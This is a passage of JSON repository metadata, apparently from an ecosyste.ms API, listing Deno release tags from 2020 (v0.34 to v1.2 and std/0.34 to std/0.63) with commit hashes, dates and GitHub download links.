v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.